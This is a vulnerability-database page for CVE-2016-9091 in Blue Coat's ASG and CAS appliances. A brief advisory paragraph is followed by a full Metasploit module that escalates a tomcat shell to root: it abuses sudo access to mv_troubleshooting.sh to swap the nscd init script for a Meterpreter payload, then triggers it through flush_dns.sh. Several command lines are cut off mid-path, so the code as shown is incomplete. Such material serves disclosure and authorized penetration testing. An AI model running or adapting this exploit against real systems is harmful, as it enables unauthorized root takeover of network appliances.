OS Command Injection Vulnerability in ASG and CAS (CVE-2016-9091)

2017-04-1300:00:00

Root

www.seebug.org

EPSS

0.015

Percentile

87.2%

JSON

The Advanced Secure Gateway (ASG) and Content Analysis System (CAS) management consoles provide a web UI for appliance administrators to manage and monitor the respective appliance. Each management console provides limited functionality to administrators and does not provide them with access to the underlying operating system.

The ASG and CAS management consoles are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with the privileges of the management console service. The malicious administrator can also elevate their privileges and execute OS commands with root privileges.

This vulnerability can be exploited only through the ASG and CAS management interfaces. Blue Coat recommends that customers deploy the ASG and CAS appliances in a secure network and restrict access to the management interface. Not deploying the appliance in a secure network or restricting management interface access increases the threat of exploiting the vulnerability.


                                                require 'msf/core'
require 'rex'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
 
 
class Metasploit4 < Msf::Exploit::Local
  Rank = AverageRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::Local::Linux
 
  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)',
        'Description'   => %q{
          This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate
          privileges. In order to work, a tomcat session with access to sudo on the sudoers
          is needed. This module is useful for post exploitation of BlueCoat
          vulnerabilities, where typically web server privileges are acquired, and this
          user is allowed to execute sudo on the sudoers file.
        },
        'License'        => MSF_LICENSE,
        'Author'       => [
         'Chris Hebert <chrisdhebert[at]gmail.com>',
         'Pete Paccione <petepaccione[at]gmail.com>',
         'Corey Boyd <corey.k.boyd[at]gmail.com>'
        ],
        'DisclosureDate' => 'Vendor Contacted 8-31-2016',
        'References'     =>
        [
          ['EDB', '##TBD##'],
          ['CVE', '2016-9091' ],
          ['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138']
        ],
        'Platform'       => %w{ linux unix },
        'Arch'           => [ ARCH_X86 ],
        'SessionTypes'   => [ 'shell', 'meterpreter' ],
        'Targets'        =>
          [
            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
        'DefaultTarget' => 0,
      }
      ))
    register_options([
        OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]),
      ], self.class)
  end
 
  def check
    id=cmd_exec("id -un")
    if id!="tomcat"
      print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat")
      fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat")
    end
 
    clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
    if clprelease!="1.3.7.1"
      print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
      fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
    end
 
    return Exploit::CheckCode::Vulnerable
  end
  def exploit
    print_status("#{peer} - Checking for vulnerable BlueCoat session...")
    if check != CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1")
    end
 
    print_status("#{peer} - Running Exploit...")
    exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
    write_file(exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{exe_file}"
 
    begin
      #Backup original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
      #Replaces /etc/init.d/nscd script with meterpreter payload
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
      #Executes meterpreter payload as root
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
      #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
    ensure
      #Restores original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
      #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
      cmd_exec "/bin/rm -f #{exe_file}"
    end
    print_status("#{peer} - The exploit module has finished")
    #Maybe something here to deal with timeouts?? noticied inconsistant..  Exploit failed: Rex::TimeoutError Operation timed out.
 
  end
end

EPSS

0.015

Percentile

87.2%

JSON

Related for SSV:92941